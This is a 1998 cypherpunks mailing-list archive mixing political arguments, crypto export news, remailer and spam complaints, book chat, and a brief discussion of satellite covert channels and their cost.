Message-ID: <35FF2647.77F8@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



Sunder wrote:
> 
> nnburk wrote:
> >
> > Predictions: Crime and Criminal Justice in the 21st Century
> > ...
> > 2.      As the large pool of young people born in the early 1990s
> > become teenagers and young adults, there will be a dramatic
> > increase in violent crime around the year 2005-2010.
> 
> I don't necessarily see this.  What do you base this on?  

Um, actually, not _my_ predictions. Source was local LEA, obtained by them from some  
nameless seminar. (Sorry. Should have made that point clear earlier.)


> > 5.      As faith in the criminal justice system declines, there
> > will be a rise in vigilante-based incidents where citizens take
> > the enforcement of crime problems into their own hands.
> 
> The rest of your prediction sounds like you've watched Robocop a few times too
> many and actually BELIEVED it! :)  Care to back it up with reasons?
> 

See above. <grin> Actually, haven't seen Robocop!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 15 Sep 1998 12:47:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Mersienne crack busted...
In-Reply-To: <v04011718b2244f17bc80@[139.167.130.246]>
Message-ID: <35FEA81D.6B7CD5B2@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:
> 
> Somebody evidently installed the Mersienne(sp?) prime search client on
> 2000+ AT&T machines.
> 
> The local talk station news has a report that they have just been
> apprehended and will be prosecuted for it.

Mersenne.

Perhaps the company should be grateful that someone has helped
to spot a hole in security, since the hacker has apparently done
no really serious damages except computing time.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Tue, 15 Sep 1998 19:11:19 +0800
To: <AIMSX@aol.com>
Subject: Re: Voices
In-Reply-To: <63f52c6a.35fefb8e@aol.com>
Message-ID: <3.0.2.32.19980915200546.007c4330@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

That reminds me of a line from All Creatures Great and Small, about a 
flatulent dog, "Speak on sweet lips! truer words were never spoken."

Edwin

At 07:43 PM 9/15/98 EDT, you wrote:
>Preach on brother =)
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNf8A2UmNf6b56PAtEQLJLgCdHDNFfk6mZnpQi9UGtrlTUvGebMwAoN6u
kvQiuoyegMpuIXHfUmqbFxQS
=wEvm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Tue, 15 Sep 1998 19:31:28 +0800
To: edsmith@IntNet.net
Subject: Re: Voices
Message-ID: <65e46469.35ff051e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



I read that book 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Tue, 15 Sep 1998 19:43:57 +0800
To: <AIMSX@aol.com>
Subject: Re: Voices
In-Reply-To: <65e46469.35ff051e@aol.com>
Message-ID: <3.0.2.32.19980915203143.007c3af0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Shit! Now you got me to wondering. Which book?

At 08:23 PM 9/15/98 EDT, you wrote:
>I read that book 
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNf8G7kmNf6b56PAtEQIIPwCfT+a6I3Hab0FXtHOrqbtxaojAM3kAoMFd
9V1srpx4uXxeYmYMN2hEuE40
=fo/N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Sep 1998 22:45:24 +0800
To: Jaeger <cypherpunks@toad.com
Subject: Re: Democracy...
In-Reply-To: <19980915210638.14549.qmail@hotmail.com>
Message-ID: <v03130302b224e28e4438@[209.133.20.11]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:27 PM -0700 9/15/98, Jaeger wrote:
>hey, would you care to show us where "seperation of church and state" is
>to be found in the constitution/bill of rights?  absolute right and

Gee, check out the First Amendment to the U.S. Constitution. Also the first
item in the Bill of Rights. "Congress shall make no law respecting the
establishment of religion or prohibiting the free exercise thereof..."
(from memory, so don't bother me with minor wording corrections.)

By standard convention, this is also referred to as "separation of church
and state."

As with the clueless AOLers yakking about an "Assimov" story they read a
couple of years ago in the 5th grade, you bozos need to get educated and
spend a minute or two thinking before writing.


--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<8kmc50f5@auto.sixdegrees.com>
Date: Tue, 15 Sep 1998 20:00:23 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Christopher Barkley
Message-ID: <199809160055.RAA14864@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately Christopher 
Barkley (barkley@cirr.com) asked not to be listed as your 
contact with sixdegrees.

The good news is that since you have other confirmed contacts, 
you'll still be able to have a productive sixdegrees experience. 
But, if you want to continue to increase your networking power, 
you may want to head over to http://www.sixdegrees.com , log-in 
and go to MY CONTACTS and list additional contacts. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================




E.DB.BRESP.2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Barkley <christopher.barkley@srcm.com>
Date: Tue, 15 Sep 1998 20:00:58 +0800
To: cypherpunks@toad.com
Subject: Regards
Message-ID: <35FF0C5A.C1F80B6B@srcm.com>
MIME-Version: 1.0
Content-Type: text/plain



Apparently, I just spammed your list a couple of days ago; my
apologies.  Some zithead listed your email address in the Six Degrees
networking service and starting asking people to be his contacts.  One
can only hope his fate is neither swift nor pretty.  (I bear some of the
blame; I should have recognized the email address since I have several
friends on the list.)

At any rate, my thanks to Tom Perry for his polite explanation of the
situation.

As for the REST of you who responded, you have my sympathies.  With any
luck, they'll get that thorazine prescription refilled soon.

Cheerio,
Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 14:14:06 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199809151914.VAA17736@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Nothing on this end filters unless it comes from/to:

cypherpunks-unedited@toad.com
mosexpo.ru
fw9.telekom.edu
any.where.com

I filter these because the dumbshit's at mosexpo.ru keep sending messages
with munged headers that fill up postmaser's mailbox with delivery failure
messages. I got tired of using the 'd' key. But even in this case, I only
filter *after* I've forwarded the traffic to the other nodes.

The only other quirk I'm aware of regarding anon posts are ones without
subjects, in which case I get a notice that the Japanese node is dropping
it because it doesn't have headers. This should come as no surprise as I've
made mention several times on this issue.

-----

The post I made earlier went through without a problem, but as I mentioned in my original post I had made several anon posts through replay.com to cypherpunks@ssz.com and they never made it to the list.

I also noticed that replay.com seems to be striping the subject from the posts as in my last post I *did* put a subject line on the message but it arrived to the list without one.

In the messages I sent, a couple of them I used a chain of remailers but when they failed to appear I sent the remaining messages through replay.com only (using the https interface to send the messages).

It may have just been a problem on replay's end but on all the posts I did get a conformation page that the messages had been accepted.

Odd.

I AM TOTOCUS!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Scott Porterfield <johnscot@sylvania.sev.org>
Date: Tue, 15 Sep 1998 20:22:35 +0800
To: sixdegrees <tubc50u4@auto.sixdegrees.com>
Subject: Re: Harald Fragner
In-Reply-To: <199809151350.GAA08886@toad.com>
Message-ID: <35FF10F0.B0B326C9@sylvania.sev.org>
MIME-Version: 1.0
Content-Type: text/plain



How do I get off this list!!!  

Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeger <Jaeger@hempseed.com>
Date: Tue, 15 Sep 1998 21:35:34 +0800
To: cypherpunks@toad.com
Subject: Re: Democracy...
In-Reply-To: <19980915210638.14549.qmail@hotmail.com>
Message-ID: <35FF220A.F88B87F6@hempseed.com>
MIME-Version: 1.0
Content-Type: text/plain



hey, would you care to show us where "seperation of church and state" is
to be found in the constitution/bill of rights?  absolute right and
wrong is not a religious belief (necessarily)..  your religious beliefs
do not affect the nature of reality.  there are absolute truths by
necessity...  see, there is NO WAY that there could not be.  Because if
there were no absolute truths, then that would mean that NOTHING is
absolute.  That statement in itself is an absolute.  now, as for
absolute truths regarding the president, there may or may not be any as
far as most people are concerned.  people always seem to make an
exception for people who agree with them...  in order to be an effective
president, however, one must uphold the very basis of this country, by
upholding the law.  Clinton perjured himself, obstructed justice, and
tampered with witnesses in a grand jury investigation (which was
incidentally <sp?> being conducted by a man who was praised just months
earlier as unbiased and very qualified for the job).  The man is
supposed to be the figurehead for our system of gov't.  If he cannot
follow the law, then he is not fit for the office.

Jaeger

> Ever heard of seperation of church and state? Democracy? the rights of
>
> the individual?  While you certainly have the right to practice your
> religion in what ever manner you so choose demanding that everyone
> else
> does, or that the president of the us of ais subject to you PERSONAL
> faith decisions is outragous
>
> Vivek Vaidya
>
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon@zd.com
Date: Tue, 15 Sep 1998 20:38:24 +0800
To: cypherpunks@toad.com
Subject: FWD: Clinton administration will ease grip on crypto exports
Message-ID: <199809160128.VAA27836@u5.zdnet.com.>
MIME-Version: 1.0
Content-Type: text



This message was forwarded to you from ZDNet (http://www.zdnet.com) by anon@zd.com.

Comment from sender:
The dance of the seven regs continues.....

   ---------------------------------------------------------------------

   This article is from ZDNN (http://www.zdnet.com/zdnn/).
   Visit this page on the Web at:
   http://www.zdnet.com/zdnn/stories/zdnn_smgraph_display/0,4436,2138029,00.html

   ---------------------------------------------------------------------


   [IMAGE]
   By Will Rodger, Inter@ctive Week Online
   September 15, 1998 5:39 PM PT

   The Clinton Administration is expected to relax export controls on
   data scrambling equipment Wednesday, preparing the ground for yet
   another round of debate over current encryption policy.

   According to Administration sources, the White House will loosen its
   grip on the technology in several areas central to the five-year
   argument over the issue. Among other things, the new policy will relax
   controls for sales to specific industries, including e-commerce,
   medicine and insurance

   The liberalization will fall far short of what Administration critics
   wanted. Even so, many crypto advocates expressed hope their position
   will continue to gain ground.

   "It's not as far along as my bill would go, but it's a significant
   improvement on our current policy," said Rep. Zoe Lofgren, D-Calif., a
   sponsor of encryption liberalization legislation in the House and one
   of several key Democrats briefed on the issue on the last two days.
   "It will still give us something to argue about next year."

   [TABLE NOT SHOWN] Electronic encryption, or the process of scrambling
   information so that only its intended recipient can read it, is widely
   believed to be the sine qua non of secure commerce and personal
   information on an insecure Internet. To date, however, Federal policy
   has required stringent licensing of encryption technology that uses
   digital codes, or "keys," longer than 40 bits in length. Law
   enforcement has insisted on that restriction so that the encoding
   technology cannot be used to thwart surveillance techniques used in
   investigations.

   Current exceptions will expand
   Under an exception granted in December 1996, however, the government
   has allowed exports of equipment whose keys are as long as 56 bits, or
   roughly 64,000 times more powerful than 40-bit products. That
   exception was granted companies that committed to develop technologies
   to give law enforcement "lawful access" to messages encrypted with
   their products through various back doors built into them.

   Notably free from those restrictions have been foreign financial
   institutions, which in most cases have been able to buy U.S.-made
   encryption software of unlimited strength since last year.

   That exception will be broadened under the new policy, sources said.
   Now, insurance companies, handlers of medical records and companies
   that use specialized transaction software to do business over the
   Internet will be able to buy American encryption software after a
   one-time review of their purchase plans by the U.S. Commerce
   Department. In addition, administration sources confirmed Tuesday
   evening, the government will no longer require prior approval of "key
   recovery" agents, who hold spare keys to encoded messages for law
   enforcement.

   Some 45 nations, including Russia, China, Venezuela and Mexico, will
   likely be ineligible for the relief control as long as the U.S.
   government believes they harbor money-laundering operations, however.

   Finally, administration sources said, any U.S. company will be able to
   export powerful encryption technology to its own subsidiaries as long
   as it does not share the technology with non-US companies.

   Playing catch-up
   As before, public interest groups said they believe the new policy
   does not go far enough. Since Vice President Al Gore promised relief
   for medical records, e-commerce and financial institutions some two
   years ago, critics said the policy is more a belated catch-up than
   anything truly new.

   "It's a divide and conquer strategy," said David Banisar, policy
   counsel with the Electronic Privacy Information Center. "This will
   help a few large users, but the average consumer is out in the cold."

   Wednesday's announcement is only the latest step in a years-long
   journey from complete control to liberalization. Though the FBI and
   others within the national security apparatus have insisted on tight
   controls, information technology companies and public interest groups
   have fought them bitterly, insisting a flood of foreign products will
   soon take over a world market which was once almost exclusively
   America's. As foreign producers have mounted - more than 500 foreign
   products are now stronger than what can usually be exported from the
   US - that pressure has increased.

   Technology marches on
   The steady march of computer technology, too, has rendered once-secure
   products obsolete; the Electronic Frontier Foundation, for instance,
   unveiled a computer last June which can crack messages encrypted with
   56-bit keys in hours. Until recently, the FBI had claimed such
   messages could be cracked only in a matter of months, if not years.

   Dan Scheinman, vice president for legal and government affairs at
   Internet hardware producer Cisco Systems Inc., said the latest
   proposal wasn't his company had hoped for. Even so, "Anything that
   provides broader relief is a step in the right direction," he said.

   In the administration's defense
   Meanwhile, the administration has its defenders. Stewart Baker, former
   counsel to the super-secret, encryption-controlling National Security
   Agency and an attorney who negotiates export agreements for industry,
   called on critics to give the administration more credit.

   "I think this is a significant walking away from an emphasis on
   law-enforcement access," he said. "What this says is if there's a
   market for security, we ought to think about liberalizing. It's a big
   step and it foreshadows more."

   ---------------------------------------------------------------------

   Copyright (c) 1998 ZDNet. All rights reserved. Reproduction in whole
   or in part in any form or medium without express written permission of
   ZDNet is prohibited. ZDNet and the ZDNet logo are trademarks of
   Ziff-Davis Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Sep 1998 21:04:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Voices (fwd)
Message-ID: <199809160229.VAA02825@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 15 Sep 1998 21:46:59 EDT
> To: edsmith@IntNet.net
> Subject: Re: Voices

> I also read an Aasimov a while back in fifth grade - unfortunately, I can't
> remember even the name... I need to pick some of his books up again... 
> One book I can remember reading since 5th grade (and every summer thereafter)
> is "IT" by Stephen King - one of his few really good books.  I have read it 8
> times since.
> I greatly recommend it =)

Stephen King is no horror writer, he's a pussy wanna be. If you want a really
good author then check out Poppy Z. Brite.

Lost Souls (read this one first) 
Drawing Blood
Exquisite Corpse (if you've ever wondered if you were the least bit
                  homophobic, when you finish this one you'll know)

You'll either read about 2-3 pages and quit in utter refulsion and disgust
or else you'll be hooked.

Sombody else to try is:

Grave markings
Michael A. Arnzen

Ann Rice? Give me a break...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 15 Sep 1998 23:30:12 +0800
To: "Lynne L. Harrison" <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <Pine.GSO.3.95.980914063037.25313E-100000@well.com>
Message-ID: <3.0.5.32.19980915212954.008c0100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



> > As for Monica-Clinton, what appears to be the case doesn't matter 
> > in some ideologies. 
> > Can meaningful consent be given with such a power imbalance?

>I don't see a power imbalance here.  If a young woman in her 20's
>invitingly flashes her thong panties at a man, I don't see how she can be
>portrayed as the victim.  The only way that the issue of power arises is
>that Monica was not overwhelmed by someone in power - she was attracted to
>the power.

Obviously you Just Don't Get It.  :-)
The argument tends to be along the lines that if power weren't
so disparate, she wouldn't have to resort to sexual bribery to get 
what she wants, she could just take it, or trade for it as an equal.

>On another but connected note, explain why Monica saved that dress!  I
>found this little tidbit to be the "yuck" factor...

Because, not being totally stupid about Clinton, she thought it might
be convenient to have some evidence around after the fact?
Whether that's for emotional blackmail, or basic blackmail, 
or life insurance, or for convincing Hillary that Bill was hers now, 
or convincing some future publisher that she hadn't made it all up, 
or just because it seemed like it might turn out to be useful in the future,
who knows.  Lots of possibilities.  Or maybe it was just a memento
of a lovely evening :-)  Or of a time when she had the President
wrapped around her little finger.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Sep 1998 23:31:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Predictions: Crime and Criminal Justice in the 21st Century
In-Reply-To: <35FDD227.4C7D@yankton.com>
Message-ID: <v03130304b224ef2238b4@[209.66.100.71]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:22 AM -0700 9/15/98, Sunder wrote:
>nnburk wrote:
>>
>> Predictions: Crime and Criminal Justice in the 21st Century
>>
>> 1.      The United States will experience a significant economic
>> recession/crisis very close to the turn of the Century.
>
>I see this as well and agree with it.  The recent stock market rocking
>back and
>forth is a sign that something sucks, and sucks badly.

Actually, I think much too much is being made of utterly _tiny_ percentage
moves in the stock market. The "Big Crash" a couple of weeks ago was the
"second largest point loss in the the history of the Dow Jones Industrial
Average."

Ah, but it was only #58 in terms of percentage.

And so on. The "rocking back and forth" is well within historical
standards. In fact, it's much less than we've seen at other times in the
past 25 years.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Mon, 14 Sep 1998 14:34:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Impeachment Petition -- NOT!
Message-ID: <3.0.3.32.19980915213638.006a471c@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Mon, 14 Sep 1998 11:54:36 -0400
>From: Ray Arachelian <sunder@brainlink.com>
>Organization: SunderNET
>X-Mailer: Mozilla 4.03 [en] (WinNT; I)
>To: "Vladimir Z. Nuri" <vznuri@netcom.com>
>CC: cypherpunks@cyberpass.net
>Subject: Re: IP: Impeachment Petition -- NOT!
>Sender: owner-cypherpunks@cyberpass.net
>Reply-To: Ray Arachelian <sunder@brainlink.com>
>X-Loop: cypherpunks@cyberpass.net
>
>So much for this being a working thing:
>
>Anyone else get a bounce?
>
>Date: Mon, 14 Sep 1998 11:20:14 -0400
>From: System Administrator <postmaster@mail.house.gov>
>To: sunder@sundernet.com
>Subject: Undeliverable: Impeach Clinton Now!
>
>
I sent mine to Vic Fazio (D-CA) about six hours ago and no bounce yet.
Maybe it's your rep's system that's down.

:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Tue, 15 Sep 1998 20:53:16 +0800
To: edsmith@IntNet.net
Subject: Re: Voices
Message-ID: <ac72ba0d.35ff1893@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



All Creatures Great and Small - that one... =)

I also read an Aasimov a while back in fifth grade - unfortunately, I can't
remember even the name... I need to pick some of his books up again... 
One book I can remember reading since 5th grade (and every summer thereafter)
is "IT" by Stephen King - one of his few really good books.  I have read it 8
times since.
I greatly recommend it =)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Sep 1998 23:46:03 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Democracy...
In-Reply-To: <19980915210638.14549.qmail@hotmail.com>
Message-ID: <v03130306b224f2bc1149@[209.66.100.71]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:09 PM -0700 9/15/98, Jaeger wrote:
>well, the first amendment is what I expected to be used...
>unfortunately, the phrase "...wall of separation between church and
>state" is not taken from the first amendment.  It is taken from a letter
>written by Thomas Jefferson...  and the meaning is not that church
>shouldn't have an effect on the state.  The state CAN support one
>religion over another.

Ah, it's the appearance of a new ranter arguing for some bizarre,
idiosyncratic interpretation of the Bill of Rights and suchlike. Mr.
Jaeger, meet Mr. Choate.

Your notion that the state can support one religion over another so long as
it does not "restrict" the other will surely be news to the many who have
studied this issue for centuries. In particular, all those legal decisions
which got Christian manger scenes removed from public buildings, and which
got "Jesus Loves Sinners, Even Jews" removed from our coinage, will surely
now have to be reversed.

 > The state CAN make laws that encourage the practice of any one
>particular religion, as long as the laws do not RESTRICT the PRACTICE of
>other religions.


Bizarre. Try Ritalin. This has helped some list members cope.

--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 15 Sep 1998 21:57:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Democracy... (fwd)
Message-ID: <199809160322.WAA03057@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 15 Sep 1998 21:27:23 -0500
> From: Jaeger <Jaeger@hempseed.com>
> Subject: Re: Democracy...

> hey, would you care to show us where "seperation of church and state" is
> to be found in the constitution/bill of rights?  absolute right and

				ARTICLE I. 
 
	Congress shall make no law respecting an establishment of religion, 
or prohibiting the free exercise thereof; or abridging the freedom of 
speech, or of the press; or the right of the people peaceably to assemble, 
and to petition the Government for a redress of grievances. 
 

				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 
 ----------------------------------------------------------------------------

The 1st prevents the government from regulating religion, even to the point
of having the authority to define what a religion is. This includes smoking
dope, raping little babies, whatever. It *IS NOT* an issue within the
guidelines of the Constitution for the *federal* government, Period, end of
story. Note that it does *not* prevent religions from participating in the
government. They could regulate any commerce of those churches that cross
state lines.

The 10th says that unless the state you happen to live in regulates religion
through a representative form of government via their own constitution then
the practice and limits of religion are to be decided by the individual.

Don't like it?

Get a god damned amendment passed modifying or nullifying one or both of the
above amendments.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Tue, 15 Sep 1998 21:38:40 +0800
To: theforum@lists.execpc.com
Subject: A definition of EVIL.
Message-ID: <3.0.2.32.19980915223228.007ac4d0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



A LIFE-AND-DEATH ISSUE

To proceed we need at least a working definition. It is a reflection of the
enormous mystery of the subject that we do not have a generally accepted
definition of evil. Yet in our hearts I think we all have some
understanding of its nature. For the moment I can do no better than to heed
my son, who, with the characteristic vision of eight-year-olds, explained
simply, "Why, Daddy, evil is 'live' spelled backward." Evil is in
opposition to life. It is that which opposes the life force. It has, in
short, to do with killing. Specifically, it has to do with murder-namely,
unnecessary killing, killing that is not required for biological survival.

from "People of the Lie" by M. Scott Peck, M.D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeger <Jaeger@hempseed.com>
Date: Tue, 15 Sep 1998 23:19:24 +0800
To: cypherpunks@toad.com
Subject: Re: Democracy...
In-Reply-To: <19980915210638.14549.qmail@hotmail.com>
Message-ID: <35FF39DF.3F322C4A@hempseed.com>
MIME-Version: 1.0
Content-Type: text/plain



well, the first amendment is what I expected to be used...
unfortunately, the phrase "...wall of separation between church and
state" is not taken from the first amendment.  It is taken from a letter
written by Thomas Jefferson...  and the meaning is not that church
shouldn't have an effect on the state.  The state CAN support one
religion over another.  In context, the phrase simply explains that the
government can't make laws that RESTRICT religious practice or doctrinal
issues.  The state CAN make laws that encourage the practice of any one
particular religion, as long as the laws do not RESTRICT the PRACTICE of
other religions.  Making people uncomfortable isn't a constitutional
reason to overturn a law.

btw, notice the wording in the first amendment...it only restricts gov't
restrictions on religion.

Jaeger

> Gee, check out the First Amendment to the U.S. Constitution. Also the
> first
> item in the Bill of Rights. "Congress shall make no law respecting the
>
> establishment of religion or prohibiting the free exercise thereof..."
>
> (from memory, so don't bother me with minor wording corrections.)
>
> By standard convention, this is also referred to as "separation of
> church
> and state."
>
> As with the clueless AOLers yakking about an "Assimov" story they read
> a
> couple of years ago in the 5th grade, you bozos need to get educated
> and
> spend a minute or two thinking before writing.
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Tue, 15 Sep 1998 22:40:19 +0800
To: "Brian B. Riley" <schear@lvcm.com>
Subject: Re: radio net
In-Reply-To: <199809152029.QAA03672@mx02.together.net>
Message-ID: <19980915234145.G26390@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Sep 15, 1998 at 04:29:06PM -0400, Brian B. Riley wrote:
> On 9/6/98 6:20 PM, Steve Schear (schear@lvcm.com)  passed this wisdom:
> 

> >It think it was Phil Karn (Qualcomm) who once mused that it would be rather
> >straightforward to masquarade a high process gain SS signal on a commercial
> >satellite transponder. To it's owners the SS signal would be almost
> >invisible, making itself known as only a very slight depression in the
> >transponder's gain. Effectively, this could offer an inexpensive covert
> >channel for tunneling packets and thwarting traffic analysis.
> >
> >After the Captain Midnight episode I discussed this possibility with a very
> >technically knowledgeable staffer at the FCC and was assured that discovery
> >of such signals were beyond (at that time) the ability of commercial and
> >national technical (e.g., Lacrosse) means.
> 
>  I would suppose the T-hunt aspects of a clandestine network would be 
> obviated by piggybacking it into a commercial satellite transponder 
> channels ... which brings to mind about how expensive one or two of those 
> channeles might be. I remeber in the early days of ham packet radio we 
> had several 'wormholes' where hams had obtained through their places of 
> employemnt temporary use of unused satellite channels where we were given 
> essentially RS232 access and we adapted the packet switches to an async 
> backchannel in place of another synch RF path. They did make for some 
> intersting network improvements. I guess it always comes down to how do 
> you fund such things.

	At one time I had some involvement with a company renting
satellite space, and the figure of around $1500 to $3000 a month for a
voice channel capable of being used on small VSAT sized dishes was
passed around.  It depends on how much bandwidth and power the channel
uses which in turn depends on how big the dishes are (G/T to be exact).
Bigger dishes mean weaker signals on the satellite and lower charges. I
could probably find out the formula used to price the service...

	I suspect that the cost of equipment and licensing and regulatory
compliance of various sorts might make it unpleasant for loosely knit
groups of private citizens - uplinks require competant installation
and maintainence to keep them from causing interference to other users
and various other problems such as RF radiation hazards under control.

	On the other hand, satellites are crawling with little signals
transmitting streams of data or voice or music to groups of receivers
scattered over wide geographic areas, so the econmics aren't prohibitive
for people who have some real need...

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 16 Sep 1998 01:57:14 +0800
To: cypherpunks@cyberpass.net
Subject: SNET: National ID Cards- world wide phenomenon
Message-ID: <199809160658.XAA22977@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton)
Subject: SNET: National ID Cards- world wide phenomenon
Date: Tue, 15 Sep 1998 14:03:47 +1200
To: snetnews@world.std.com


->  SNETNEWS  Mailing List

http://www.privacy.org/pi/activities/i dcard/"
National ID Cards

Many countries are actively considering adopting national id cards for a
variety of functions. These
include the United States, United Kingdom and Canada. Over the past seven
years, Privacy International
has been at the forefront of opposing these proposals in a number of
countries including Australia, New
Zealand, the Phillippines, Thailand, the United Kingdom and the United States.

These pages are an attempt to bring together materials based on PI members'
experiences on opposing
the proposals. While each jurisdictions may have local variations, the
themes remain remarkably similar
no matter where the proposals are heard. Our intention here is to discuss
the evidence at an international
level and to promote debate about the claims made about such card systems.



Privacy International Materials

       Privacy International's ID Card FAQ. Frequently Asked Questions
report on id cards. (7000 words)

       Campaigns of Opposition to ID Cards. A review and analysis of the
successful campaign to kill the Australia
       Card in 1987.

       Personal views from around the world on ID cards.


The UK Government ID Card Proposal

       The UK ID card proposal was quietly set aside in 1996.

       UK Home Office Green Paper "Identity Cards - A Consultation"

       Home Office press release on id cards, 24 January 1996.

